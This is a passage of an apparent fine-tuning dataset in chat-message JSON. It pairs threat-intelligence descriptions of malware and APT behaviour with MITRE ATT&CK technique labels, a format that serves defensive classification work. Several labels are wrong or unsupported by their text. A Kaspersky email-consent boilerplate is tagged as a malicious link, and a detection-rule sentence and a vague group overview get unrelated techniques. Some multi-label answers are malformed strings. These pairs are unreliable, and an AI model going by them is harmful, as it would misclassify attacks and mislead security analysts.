file calledauthd_service The last two commands stand out" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1132 - Data Encoding', 'T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can upload, download, and execute files on the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has been known to create or enable accounts, such as \"support_388945a0\"." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer." }, { "role": "assistant", "content": "T1565.002 - Transmitted Data Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet infected WinCC machines via a hardcoded database server password." }, { "role": "assistant", "content": "T1078.001 - Valid Accounts: Default Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has used regsvr32.exe to execute components of VirtualBox." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most of the infected sites use the TYPO3 CMS (see: https://typo3.org/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sends an OS version identifier in its beacons." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "root/.ssh/{id_rsa, id_rsa.pub} – the SSH pair key used to update the miner from the C&C server using SCP. opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 used a Trojan called KEYLIME to collect data from the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can access the webcam on a victim's machine." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used VBScript to initiate the delivery of payloads." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography', 'T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has the capability to kill any running analysis processes and AV software." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT has a command to enumerate running processes and identify their owners." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can collect the time zone information from the system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After compromising a victim, Poseidon Group lists all running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TRITON’s TsLow python module pings controllers over the TriStation protocol." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration." }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In observed traffic these HTTP response bodies attempt to appear like benign XML related to .NET assemblies, but command data is actually spread across the many GUID and HEX strings present. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings" }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to scan for security tools such as firewalls and antivirus tools." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "id — the generated unique identifier of the infected host - message — the Base64-encoded output from the newly created cmd.exe console process" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool that can detect the existence of remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proofpoint researchers frequently observe Silent Librarian’s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university’s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server" }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1598.003 - Spearphishing Link', 'T1608.005 - Link Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT can collect local data from an infected machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has been delivered to victims via emails with malicious HTML attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has downloaded additional scripts and files from adversary-controlled servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITSAdmin tool - Win32 apps BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. Using BITS - Win32 apps Using BITS - bitsadmin examples Examples showing how to use the bitsadmin tool to perform the most common tasks. Background Intelligent Transfer Service - Win32 apps Background Intelligent Transfer Service (BITS) transfers files (downloads or uploads) between a client and server and provides progress information related to the transfers. cleanmgr Configure the Disk Cleanup tool (Cleanmgr.exe) to automatically clean up certain files. bitsadmin Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a module for loading and executing PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has been observed enumerating system drives and partitions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses a software packer called Pe123\\RPolyCryptor." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobian RAT creates an autostart Registry key to ensure persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook is a Python-based backdoor compiled with PyInstaller." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has used HTTP and HTTPs for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is obfuscated using the open source ConfuserEx protector. also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Derusbi has used unencrypted HTTP on port 443 for C2." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT has the ability to collect drive and file information on an infected machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyZBot contains functionality to collect information from the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor’s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed injecting in to Explorer.exe and other processes." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyDrive can download files to the compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has been observed querying installed antivirus software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT19 HTTP malware variant used Base64 to encode communications to the C2 server." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1074 - Data Staged', 'T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has sent data over HTTP if FTP failed, and has also used a fallback server." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2’s calculated MD5 hash to determine which key to use, as shown in Figure 10" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used tools to encode C2 communications including Base64 encoding." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is written in PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence Once started, the Keydnap backdoor installs a plist file in /Library/LaunchAgents/ if it has root privileges or $USER/Library/LaunchAgents/ otherwise to achieve persistence across reboots" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. Through 2013, registry persistence was set using standard Windows APIs. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1505.003 - Server Software Component: Web Shell', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used stolen certificates to sign its malware." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates" }, { "role": "assistant", "content": "T1587.003 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing was run through a deployed Ubuntu container." }, { "role": "assistant", "content": "T1610 - Deploy a container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Email* - - * I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An example of this decompressed configuration may be seen below: Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following: Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has created Windows tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates valid users to provide access to the system." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - 